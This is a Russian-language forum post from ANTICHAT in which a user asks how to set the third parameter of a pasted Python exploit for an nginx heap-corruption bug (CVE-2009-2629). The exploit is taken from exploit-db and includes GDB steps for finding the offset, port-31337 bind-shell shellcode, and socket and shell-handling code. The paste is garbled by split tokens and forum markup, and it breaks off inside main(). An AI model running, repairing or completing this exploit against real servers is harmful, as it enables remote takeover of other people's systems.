ANTICHAT — форум по информационной безопасности, OSINT и технологиям

кто пользовался данным эксплойтом? интересует 3 параметр) что я должен туда поставить?) вот код эксплойта (взят с exploit-db)

CVE-2009-2629

[PHP]
PHP:
[COLOR="#000000"]#!/usr/bin/env python

#

# Exploit Title: nginx heap corruption

# Date: 08/26/2010

# Author: aaron conole

# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz

# Version: offset)

#

# At that point, merely dump the *r; captu re the value for the data pointer

# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to t he

# hex pointer value). That should give you� �a good area to test with. You might

# want to use the range at that point and set the last octet to 00.

#

# NOTE: you'll need a configuration with me rge_slashes enabled. I haven't yet

# found a "magic" combination that would ca use the state machine to do

# what I want to make the bug trigger. On ce I do, you can bet BUG will be

# replaced.

#Basically, on BT4:

#- compile

#- edit the configuration to enable merge sla shes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")

#- Launch nginx, and attach GDB to the worke r

#- Send the exploit at it with offset 0x1111 1111

#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"

#- In the r data structure will be a few d ifferent fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (le ts say 0x8c1d32f).

#- Save off this address, and detach from th e worker. A new one will spawn (the "manag er" process will keep it going).

#- At this point, rerun the exploit, setting� �the offset to 0x8c1d300 and adding the -b flag

#- In a minute or two, you should be given� �the shell.

import os

import sys

import socket

import select

import struct

import time

import urllib

REQUEST_METHOD='GET '

# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)

NULLPTR='\x00\x00\x00\x00'

# NOTE - this shellcode was shamelessly stolen from� �the www

# port 31337 bindshell for /bin/sh

SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\ xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x6 6\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\ xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe 1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\ xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\ x68\ x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xc d\x80'

# Why did I write this up this way? Becau se given enough time, I think I can

# find a proper set of state change which� �can give me the same effect (ie: ../

# appearing as the 3rd, 4th, and 5th chara cters) at a later date.

# That's all controlled by the complex uri� �parsing bit, though.

DOUBLE_SLASH='//../'

BUG=DOUBLE_SLASH

# taken from the metasploit pattern_create.rb

PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4A b5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4A

c5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1 Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1

Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4[COLOR="#DD0000"]'

def connect_socket(host,port):

sock = socket.socket(socket.AF_INET, socket.SOC K_STREAM)

try:

sock.connect( (host, port) )

except:

return 0

#sock.setblocking(0)

return sock

def handle_connection(sock):

while(1):

r, w, e = select.select( [sock, sys.stdin],

[],

[sock, sys.stdin] )

for s in r:

if s == sys.stdin:

buf = sys.stdin.readline()

try:

if buf != '':

sock.send(buf)

except:

print "Xon close?"

return 0

elif s == sock:

try:

buf = sock.recv(100)

except:

print "Xon close?"

return 0

if buf != '':

sys.stdout.write(buf)

def main(argv):

argc = len(argv)

if argc [-b]" % (argv[0])

print "[*] exploit for nginx